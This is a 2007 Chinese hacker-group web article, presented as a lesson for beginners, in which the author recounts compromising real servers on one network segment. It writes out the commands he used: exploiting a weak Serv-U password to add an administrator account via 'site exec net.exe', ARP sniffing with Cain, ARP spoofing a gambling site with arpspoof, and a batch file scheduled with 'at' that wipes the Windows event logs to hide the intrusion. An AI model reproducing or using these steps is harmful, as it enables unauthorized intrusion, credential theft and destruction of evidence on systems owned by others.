我的ARP经历同一网段站点全部沦陷 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文	用户登录新用户注册

我的ARP经历同一网段站点全部沦陷

热荐

【字体：小大】

我的ARP经历同一网段站点全部沦陷

作者：消失再消… 文章来源：C.R.S.T 点击数：更新时间：2007-6-16

文章来源：C.R.S.T

作者：消失再消失

QQ617595

EMAIL：dj104434497@163.com

个人站点：http://3800hk.cn/blog/djandsj/index.html
=====================================================================================
注:本文适合新人学习.
前几天看上了一个SF发布的站点,被在它同一网段上发现有个赌博站.
(我最讨厌赌博站,害人的站点)
之后我看了一下那个SF发布站,本来想从这个站入手,但是做了防注,之后我又下了它论坛的YXBBS程序.可惜..............还是没搞下.
无奈....
旁注? 用工具检测不出有任何站点绑定在上面只好拿出最后的手段ARP或者嗅探了...
用流光扫了一下和他同段的机器.发现大多都开了3389.
又搞到一个servu6.3弱口令的机器. 老方法看看有执行权限没.
进入CMD
输入用户:admin
密码:123456
cd c:
竟然ok ,看来有希望
继续
cd windows
cd system32
进入到system32目录了
用queto site exec net.exe user xiaoshi xiaoshi /add
添加用户
queto site exec net.exe localgroup administrators xiaoshi /add
提升权限
ok
提示250.
登陆3389..........
目的是和这个肉鸡相隔4个IP的站这个肉鸡的D段为13 目标为9
装上4.7汉化版的cain.(因为比较方便不像ARPSNIFFER需要多开窗口,但是容易被发现)
扫了一下MAC地址,发现很多,基本上 255个IP都是.
开始嗅吧....等者我们的肉鸡上来,哈哈....
等了将近一个小时截取到RDP数据10个都没获得密码,或许是因为没有登陆只是用连接了一下吧
后来我嗅了一晚上,什么都没搞到,http到搞到不少截取了一个有用的密码但是是40位的....无奈.
今天早上起来,首先去看一下肉鸡丢了没,没丢..
之后上传了arpspoof.exe 因为这段有赌博站.欺骗它.
进入cmd输入
arpspoof XXX.XX.XX.1 XXX.XX.XX.XXX.41(赌博站的IP) 80 0 1(1为单项欺骗) /r job.txt
开始欺骗,发送爆文.
打开站点开了一下,成功.

给我的感觉这段所有的机器都没做防ARP处理.....所以全部沦陷..... (大多都不是什么正规的站,基本上以赌博,色情为主的站)
感觉这次闹的挺大,我没做任何的跳板与代理.直接进入肉鸡的.如果被XXX
那我的青春就VOVER了
清除日志....
用ClearLogs.exe传到肉鸡上(我先开始用了ASM写的工具,貌似不好用)
建立了一个批处理
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
我没上后门,所以只能用at命令了执行了
在CMD下输入at 8:40"C:\Documents and Settings\xiaoshi\桌面\clearlog\1.bat"
之后等到了8:38的时候我注销了用户安全的退出.....

文章录入：IceRiver 责任编辑：admin

上一篇文章： Ajax让Sohu邮箱成为垃圾邮件的帮凶

下一篇文章：内网渗透——如何打开突破口

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				十大入侵检测系统高风险事件认识黑客入侵的利器了解嗅探另类巧妙的思路:旁门左道的入会话劫持攻击实战详解利用最近热门的Xss漏洞能做什数据库安全应用使用MySQL的防火墙技术详细说明及技术发轻松9步加强路由器安全防护能黑客技术分析会话劫持攻击实系统泄露密码的入侵攻击分析

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM